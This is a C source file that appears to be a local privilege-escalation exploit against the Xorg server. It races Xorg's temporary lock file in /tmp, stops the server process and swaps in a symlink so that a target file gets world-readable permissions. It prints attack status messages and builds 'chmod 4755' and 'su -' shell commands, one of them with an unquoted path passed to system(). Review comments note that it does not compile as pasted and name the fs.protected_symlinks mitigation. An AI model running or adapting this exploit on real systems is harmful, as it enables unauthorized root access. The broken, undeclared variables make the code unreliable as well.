- #include <sys/types.h>
- #include <sys/stat.h>
- #include <fcntl.h>
- #include <unistd.h>
- #include <stdio.h>
- #include <syscall.h>
- #include <signal.h>
- #include <string.h>
- #include <stdlib.h>
- #define XORG_BIN "/usr/bin/X"
- #define DISPLAY ":1"
/*
 * Returns a pointer to the characters that follow "tty" in the link target of
 * /proc/self/fd/4, or NULL when that target contains no "tty".
 * NOTE(review): the readlink() return value is never checked (the buffer is
 * pre-zeroed, so a failure yields an empty string and NULL), and the returned
 * pointer points into tty_name, an automatic array whose lifetime ends on
 * return -- the only caller on this page tests the result against NULL only.
 */
char *get_tty_number(void) {
char tty_name[128], *ptr;
memset(tty_name, '\0', sizeof(tty_name));
readlink("/proc/self/fd/4", tty_name, sizeof(tty_name)); // this seems to always be free..
if ((ptr = strstr(tty_name, "tty")))
return ptr + 3;
return NULL;
}
/*
 * fork()s a child that closes stdout/stderr and execve()s XORG_BIN with
 * DISPLAY as its only argument and an empty environment, _exit()ing with 0
 * if the exec fails.
 * Returns fork()'s value to the parent: the child pid, or -1 on failure;
 * no caller on this page checks for -1.
 */
int launch_xorg_instance(void) {
int child_pid;
char *opt[] = { XORG_BIN, DISPLAY, NULL };
if ((child_pid = fork()) == 0) {
close(1);
close(2);
execve(XORG_BIN, opt, NULL);
_exit(0);
}
return child_pid;
}
/*
 * Runs "ls -l <file>" through system(); the caller-supplied path is
 * interpolated unquoted and unescaped into the shell command.
 * NOTE(review): cmd2 and cmd3 are never declared, and the "su -" format
 * string has no conversion yet is handed `file` as an argument, so this
 * function does not compile as pasted.
 */
void show_target_file(char *file) {
char cmd[524];
memset(cmd, '\0', sizeof(cmd));
sprintf(cmd, "ls -l %s", file);
memset(cmd2, '\0', sizeof(cmd2));
sprintf(cmd2, "su -", file);
system(cmd);
system(cmd2);
system(cmd3);
}
/*
 * Entry point. argv[1] (default "/tmp/sh") names the target file; two lock
 * file paths under /tmp are derived from DISPLAY, and the loop below starts
 * Xorg children while polling for the temporary lock file with stat().
 * NOTE(review): as pasted this does not compile -- `vv` is declared as an
 * int but used as a buffer, and `file` is undeclared. strcpy() from argv[1]
 * into target_file[128] is unbounded, and the return values of symlink(),
 * setuid(), setgid(), stat() and kill() are all ignored.
 * NOTE(review): the pattern depends on a privileged process following a
 * symlink placed in a world-writable directory; on Linux the
 * fs.protected_symlinks sysctl is the standard mitigation for that class.
 */
int main(int argc, char **argv) {
pid_t proc;
struct stat st;
int n, ret, vv, current_attempt = 800;
char target_file[128], lockfiletmp[20], lockfile[20], *ttyno;
if (argc < 2)
strcpy(target_file, "/tmp/sh");
else
strcpy(target_file, argv[1]);
// DISPLAY+1 skips the leading ':'; both names fit the 20-byte arrays for ":1"
sprintf(lockfile, "/tmp/.X%s-lock", DISPLAY+1);
sprintf(lockfiletmp, "/tmp/.tX%s-lock", DISPLAY+1);
// bail out if the lock file already exists
if (stat(lockfile, &st) == 0) {
return 1;
}
symlink("/dontexist", lockfile);
// `vv` is an int and `file` is undeclared here: these two lines cannot compile
memset(vv, '\0', sizeof(vv));
sprintf(vv, "chmod 4755 %s", file);
setuid(0);
setgid(0); // backup - failover
umask(077);
ttyno = get_tty_number();
// pre-decrement: the loop body runs at most 799 times
while (--current_attempt) {
proc = launch_xorg_instance();
n = 0;
// poll up to 10000 times for the temporary lock file to appear
while (n++ < 10000)
if ((ret = syscall(SYS_stat, lockfiletmp, &st)) == 0)
break;
if (ret == 0) {
syscall(SYS_kill, proc, SIGSTOP);
stat(lockfiletmp, &st);
// 4 here is the world-read bit (S_IROTH) of st_mode
if ((st.st_mode & 4) == 0)
break;
launch_xorg_instance();
sleep(2);
}
kill(proc, SIGKILL);
}
if (current_attempt == 0) {
printf("[-] Attack failed!\n");
if (!ttyno)
printf("[!] Try with console ownership: switch to a TTY* by using Ctrl-Alt-F[1-6] and try again.\n");
return 1;
}
launch_xorg_instance();
sleep(2);
if (stat(lockfiletmp, &st) == 0) {
return 1;
}
printf("[+] Creating symlink: (%s -> %s)\n", lockfiletmp,target_file);
symlink(target_file, lockfiletmp);
printf("[+] PID: %d resumed (SIGCONT sent)\n", proc);
kill(proc, SIGCONT);
usleep(30000);
stat(target_file, &st);
// 004 is S_IROTH; the message prints the whole mode in octal
if (!(st.st_mode & 004)) {
printf("[-] Attack failed,yur rights are: %o ,yu could launch a simple attack from this uid shuld bypass many prots\n", st.st_mode);
return 1;
}
unlink(lockfile);
printf("[+] Attack worked: ls -l %s:\n", target_file);
show_target_file(target_file);
chdir("/tmp/sh"); // cd to our shell..
return 0;
}